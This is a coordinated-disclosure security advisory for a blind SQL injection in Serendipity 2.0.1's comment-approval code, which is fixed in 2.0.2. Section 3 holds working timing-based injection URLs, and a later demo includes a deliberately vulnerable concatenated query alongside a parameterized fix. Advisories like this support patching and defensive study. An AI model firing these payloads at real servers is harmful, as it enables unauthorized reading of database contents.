Serendipity 2.0.1 Blind SQL Injection

01 Sep 2015 00:00:00 | Reported by Tim Coen | Type: packetstorm | Source: packetstormsecurity.com

Serendipity 2.0.1 Blind SQL Injection, fixed in 2.0.2, requires admin credentials

Serendipity 2.0.1: Blind SQL Injection  
Security Advisory – Curesec Research Team  
  
1. Introduction  
  
Affected Product: Serendipity 2.0.1   
Fixed in: 2.0.2  
Fixed Version Link:  
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip  
  
Vendor Contact: [email protected]   
Vulnerability Type: Blind SQL Injection   
Remote Exploitable: Yes   
Reported to vendor: 07/21/2015   
Disclosed to public: 09/01/2015   
Release mode: Coordinated release   
CVE: n/a   
Credits: Tim Coen of Curesec GmbH   
  
2. Vulnerability Description  
  
There is a blind SQL injection in Serendipity 2.0.1 when approving  
comments. It can be exploited content-based, but that requires an email  
token. Timing-based exploitation does not require a token and is thus  
easier to exploit.  
  
To prepare the attack, an attacker has to open the Configuration page  
and set "Use Tokens for Comment Moderation" to true.  
  
Please note that admin credentials are required.  
  
3. Proof of Concept  
  
  
http://localhost/serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=pending&serendipity[id]=8'  
AND IF(SUBSTRING(version(), 1,  
1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)  
%23&serendipity[token]=ValidAntiCSRFToken  
-> true  
  
http://localhost//serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=approve&serendipity[id]=8'  
AND IF(SUBSTRING(version(), 1,  
1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)  
%23&serendipity[token]=ValidAntiCSRFToken  
-> false  
Note that the id must be that of an existing comment, the action must be  
acceptable (i.e. only pending comments can be approved and only approved  
comments can be set to pending), and the CSRF token must be valid.  
  
4. Code  
  
  
/include/admin/comments.inc.php  

```php
serendipity_approveComment($serendipity['GET']['id'],
                           $rs['entry_id']); // <- user input
```

/include/functions_comments.inc.php  

```php
function serendipity_approveComment($cid, $entry_id, $force = false, $moderate = false, $token = false) {
    global $serendipity;

    $goodtoken = serendipity_checkCommentToken($token, $cid); // <- not secured
    [...]
}

function serendipity_checkCommentToken($token, $cid) {
    global $serendipity;

    $goodtoken = false;
    if ($serendipity['useCommentTokens']) {
        // Delete any comment tokens older than 1 week.
        serendipity_db_query("DELETE FROM {$serendipity['dbPrefix']}options
                                WHERE okey LIKE 'comment_%' AND name < " . (time() - 604800));
        // Get the token for this comment id
        $tokencheck = serendipity_db_query("SELECT * FROM {$serendipity['dbPrefix']}options
                                              WHERE okey = 'comment_" . $cid . "' LIMIT 1", true, 'assoc'); // <- still not secured
    [...]
}
```
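As an added example, not code from Serendipity and not the 2.0.2 fix, the token lookup from section 4 is shown in its vulnerable shape beside a hardened form that validates the id and binds it as a parameter; the PDO/SQLite setup, the table layout and the function names are assumptions made for this demo.

```php
<?php
// Added example, not Serendipity's code and not the 2.0.2 fix. The table
// layout, the PDO/SQLite setup and the function names are assumptions.

function buildDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE serendipity_options (okey TEXT, name TEXT, value TEXT)");
    // Constructed row: a moderation token stored for comment id 8.
    $db->exec("INSERT INTO serendipity_options VALUES ('comment_8', '1440000000', 'constructed-token')");
    return $db;
}

// Shape of the lookup quoted in section 4: $cid is concatenated into the SQL
// string, so a quote inside the id changes the query. Kept only for contrast.
function lookupTokenUnsafe(PDO $db, $cid) {
    $sql = "SELECT * FROM serendipity_options WHERE okey = 'comment_" . $cid . "' LIMIT 1";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened form: a comment id is a positive integer, so anything else is
// rejected before the database is touched, and the value is bound, not concatenated.
function lookupTokenSafe(PDO $db, $cid) {
    if (!(is_string($cid) || is_int($cid)) || !preg_match('/^[1-9][0-9]*$/', (string) $cid)) {
        return false;                      // invalid id: no query is issued at all
    }
    $stmt = $db->prepare("SELECT * FROM serendipity_options WHERE okey = :okey LIMIT 1");
    $stmt->execute([':okey' => 'comment_' . $cid]);
    return $stmt->fetch(PDO::FETCH_ASSOC); // false when no token exists for this id
}

$db = buildDemoDb();
var_dump(lookupTokenSafe($db, '8'));  // row with value => constructed-token
var_dump(lookupTokenSafe($db, "8'")); // false: rejected by the integer check
```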
  
5. Solution  
  
To mitigate this issue, please upgrade to at least version 2.0.2:  
  
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip  
  
Please note that a newer version might already be available.  
  
6. Report Timeline  
  
07/21/2015 Informed Vendor about Issue  
07/24/2015 Vendor releases Version 2.0.2  
09/01/2015 Disclosed to public  
  
7. Blog Reference:  
http://blog.curesec.com/article/blog/Serendipity-201-Blind-SQL-Injection-52.html  
  
  
